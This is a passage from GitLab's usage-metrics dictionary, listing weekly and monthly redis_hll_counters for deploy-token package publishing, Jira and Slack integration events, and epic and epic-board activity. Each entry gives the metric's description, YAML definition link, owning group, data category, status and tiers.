`redis_hll_counters.deploy_token_packages.i_package_npm_deploy_token_weekly` + +A weekly count of npm packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184832_i_package_npm_deploy_token_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_nuget_deploy_token_monthly` + +A monthly count of NuGet packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184838_i_package_nuget_deploy_token_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_nuget_deploy_token_weekly` + +A weekly count of NuGet packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184836_i_package_nuget_deploy_token_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_pypi_deploy_token_monthly` + +A monthly count of PyPI packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184842_i_package_pypi_deploy_token_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_pypi_deploy_token_weekly` + +A weekly count of Python packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184840_i_package_pypi_deploy_token_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_rubygems_deploy_token_monthly` + +Distinct count events for RubyGems packages published using a Deploy token in recent 28 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210303154626_i_package_rubygems_deploy_token_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_rubygems_deploy_token_weekly` + +A weekly count of distinct RubyGems packages published using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210303154624_i_package_rubygems_deploy_token_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_tag_deploy_token_monthly` + +A monthly count of package tags published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184846_i_package_tag_deploy_token_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_tag_deploy_token_weekly` + +A weekly count of users that have published a package tag to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184844_i_package_tag_deploy_token_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_terraform_module_deploy_token_monthly` + +Number of distinct users authorized via deploy token creating Terraform Module packages in recent 28 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210410012206_i_package_terraform_module_deploy_token_monthly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_terraform_module_deploy_token_weekly` + +Number of distinct users authorized via deploy token creating Terraform Module packages in recent 7 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210410012207_i_package_terraform_module_deploy_token_weekly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.ecosystem_total_unique_counts_monthly` + +Number of users performing actions on Jira issues by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184957_ecosystem_total_unique_counts_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.ecosystem_total_unique_counts_weekly` + +Number of users performing actions on Jira issues by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184955_ecosystem_total_unique_counts_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_jira_service_close_issue_monthly` + +Number of users closing Jira issues by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184941_i_ecosystem_jira_service_close_issue_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_jira_service_close_issue_weekly` + +Number of users closing Jira issues by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184939_i_ecosystem_jira_service_close_issue_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_jira_service_create_issue_monthly` + +Number of users creating Jira issues by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216184953_i_ecosystem_jira_service_create_issue_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_jira_service_create_issue_weekly` + +Number of users creating Jira issues by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184951_i_ecosystem_jira_service_create_issue_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_jira_service_cross_reference_monthly` + +Number of users that cross-referenced Jira issues by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184945_i_ecosystem_jira_service_cross_reference_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_jira_service_cross_reference_weekly` + +Number of users that cross-referenced Jira issues by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184943_i_ecosystem_jira_service_cross_reference_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_jira_service_list_issues_monthly` + +Count of Jira Issue List visits by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216184949_i_ecosystem_jira_service_list_issues_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_jira_service_list_issues_weekly` + +Count of Jira Issue List visits by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184947_i_ecosystem_jira_service_list_issues_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_confidential_issue_notification_monthly` + +Calculated unique users to trigger a Slack message by performing an action on a confidential issue by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210303152233_i_ecosystem_slack_service_confidential_issue_notification_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_confidential_issue_notification_weekly` + +Calculated unique users to trigger a Slack message by performing an action on a confidential issue by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302104814_i_ecosystem_slack_service_confidential_issue_notification_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_confidential_note_notification_monthly` + +Calculated unique users to trigger a Slack message by creating a confidential note by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210303152144_i_ecosystem_slack_service_confidential_note_notification_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_confidential_note_notification_weekly` + +Calculated unique users to trigger a Slack message by creating a confidential note by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302104556_i_ecosystem_slack_service_confidential_note_notification_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_deployment_notification_monthly` + +Calculated unique users to trigger a Slack message by performing a deployment by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210303150912_i_ecosystem_slack_service_deployment_notification_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_deployment_notification_weekly` + +Calculated unique users to trigger a Slack message by performing a deployment by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302103755_i_ecosystem_slack_service_deployment_notification_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_issue_notification_monthly` + +Calculated unique users to trigger a Slack message by performing an action on an issue by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210303150507_i_ecosystem_slack_service_issue_notification_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_issue_notification_weekly` + +Calculated unique users to trigger a Slack message by performing an action on an issue by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302103002_i_ecosystem_slack_service_issue_notification_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_merge_request_notification_monthly` + +Calculated unique users to trigger a Slack message by performing an action on a merge request by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210303151831_i_ecosystem_slack_service_merge_request_notification_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_merge_request_notification_weekly` + +Calculated unique users to trigger a Slack message by performing an action on a merge request by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302104007_i_ecosystem_slack_service_merge_request_notification_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_note_notification_monthly` + +Calculated unique users to trigger a Slack message by creating a note by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210303151946_i_ecosystem_slack_service_note_notification_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_note_notification_weekly` + +Calculated unique users to trigger a Slack message by creating a note by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302104047_i_ecosystem_slack_service_note_notification_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_push_notification_monthly` + +Calculated unique users to trigger a Slack message by performing a Git push by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210303150654_i_ecosystem_slack_service_push_notification_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_push_notification_weekly` + +Calculated unique users to trigger a Slack message by performing a Git push by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302103629_i_ecosystem_slack_service_push_notification_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_tag_push_notification_monthly` + +Calculated unique users to trigger a Slack message by performing a tag push by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210303152049_i_ecosystem_slack_service_tag_push_notification_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_tag_push_notification_weekly` + +Calculated unique users to trigger a Slack message by performing a tag push by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302104144_i_ecosystem_slack_service_tag_push_notification_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_wiki_page_notification_monthly` + +Calculated unique users to trigger a Slack message by performing an action on a wiki page by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210303151609_i_ecosystem_slack_service_wiki_page_notification_monthly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ecosystem.i_ecosystem_slack_service_wiki_page_notification_weekly` + +Calculated unique users to trigger a Slack message by performing an action on a wiki page by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302103907_i_ecosystem_slack_service_wiki_page_notification_weekly.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.epic_boards_usage.epic_boards_usage_total_unique_counts_monthly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210507171840_epic_boards_usage_total_unique_counts_monthly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.epic_boards_usage.epic_boards_usage_total_unique_counts_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210507171838_epic_boards_usage_total_unique_counts_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.epic_boards_usage.g_project_management_users_creating_epic_boards_monthly` + +Count of MAU creating epic boards + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210428072511_g_project_management_users_creating_epic_boards_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epic_boards_usage.g_project_management_users_creating_epic_boards_weekly` + +Count of WAU creating epic boards + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210428072508_g_project_management_users_creating_epic_boards_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epic_boards_usage.g_project_management_users_updating_epic_board_names_monthly` + +Count of MAU updating epic board names + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210428073607_g_project_management_users_updating_epic_board_names_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epic_boards_usage.g_project_management_users_updating_epic_board_names_weekly` + +Count of WAU updating epic board names + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210428073604_g_project_management_users_updating_epic_board_names_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epic_boards_usage.g_project_management_users_viewing_epic_boards_monthly` + +Count of MAU viewing epic boards + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210428073329_g_project_management_users_viewing_epic_boards_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epic_boards_usage.g_project_management_users_viewing_epic_boards_weekly` + +Count of WAU viewing epic boards + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210428073327_g_project_management_users_viewing_epic_boards_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.epics_usage_total_unique_counts_monthly` + +Total monthly users count for epics_usage + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210318183733_epics_usage_total_unique_counts_monthly.yml) + +Group: `group::product planning` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.epics_usage_total_unique_counts_weekly` + +Total weekly users count for epics_usage + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210318183220_epics_usage_total_unique_counts_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_closed_monthly` + +Counts of MAU closing epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210310163213_g_project_management_epic_closed_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_closed_weekly` + +Counts of WAU closing epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210310162703_g_project_management_epic_closed_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_created_monthly` + +Count of MAU creating epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210305144719_g_product_planning_epic_created_monthly.yml) + +Group: `group::product planning` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_created_weekly` + +Count of WAU creating epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210305145820_g_product_planning_epic_created_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_cross_referenced_monthly` + +Count of MAU cross referencing epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210430174100_g_project_management_epic_cross_referenced_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_cross_referenced_weekly` + +Counts of WAU cross referencing epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210430173650_g_project_management_epic_cross_referenced_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_destroyed_monthly` + +Count of MAU destroying epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210413174710_g_project_management_epic_destroyed_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_destroyed_weekly` + +Count of WAU destroying epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210413174449_g_project_management_epic_destroyed_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_issue_added_monthly` + +Count of MAU adding issues to epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210312144719_g_product_planning_epic_issue_added_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_issue_added_weekly` + +Count of WAU adding issues to epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210312181918_g_product_planning_epic_issue_added_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_issue_moved_from_project_monthly` + +Counts of MAU moving epic issues between projects + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210405190240_g_project_management_epic_issue_moved_from_project_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_issue_moved_from_project_weekly` + +Counts of WAU moving epic issues between projects + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210405185814_g_project_management_epic_issue_moved_from_project_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_issue_removed_monthly` + +Count of MAU removing issues from epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210401183230_g_project_management_epic_issue_removed_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_issue_removed_weekly` + +Counts of WAU removing issues from epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210401182457_g_project_management_g_project_management_epic_issue_removed_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_reopened_monthly` + +Counts of MAU closing epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210310164247_g_project_management_epic_reopened_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_reopened_weekly` + +Counts of WAU re-opening epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210310164112_g_project_management_epic_reopened_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_users_changing_labels_monthly` + +Count of MAU chaging the epic lables + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210312195730_g_project_management_epic_labels_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_epic_users_changing_labels_weekly` + +Count of WAU chaging the epic lables + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210312195849_g_project_management_epic_labels_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_issue_promoted_to_epic_monthly` + +Count of MAU promoting issues to epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210331193236_g_project_management_issue_promoted_to_epic_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_issue_promoted_to_epic_weekly` + +Counts of WAU promoting issues to epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210331192332_g_project_management_issue_promoted_to_epic_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_awarding_epic_emoji_monthly` + +Counts of MAU awarding emoji on epic + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210503011217_g_project_management_users_awarding_epic_emoji_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_awarding_epic_emoji_weekly` + +Counts of WAU awarding emoji on epic + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210503011355_g_project_management_users_awarding_epic_emoji_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_creating_epic_notes_monthly` + +Counts of MAU adding epic notes + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210314215451_g_project_management_users_creating_epic_notes_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_creating_epic_notes_weekly` + +Counts of WAU adding epic notes + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210314231518_g_project_management_users_creating_epic_notes_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_destroying_epic_notes_monthly` + +Counts of MAU destroying epic notes + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210315034808_g_project_management_users_destroying_epic_notes_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_destroying_epic_notes_weekly` + +Counts of WAU destroying epic notes + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210315034846_g_project_management_users_destroying_epic_notes_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_epic_issue_added_from_epic_monthly` + +Number of users creating an issue from an epic + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210608191652_g_project_management_users_epic_issue_added_from_epic_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium` + +### `redis_hll_counters.epics_usage.g_project_management_users_epic_issue_added_from_epic_weekly` + +Number of users creating an issue from an epic + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210608191647_g_project_management_users_epic_issue_added_from_epic_weekly.yml) + +Group: `group::product planning` + 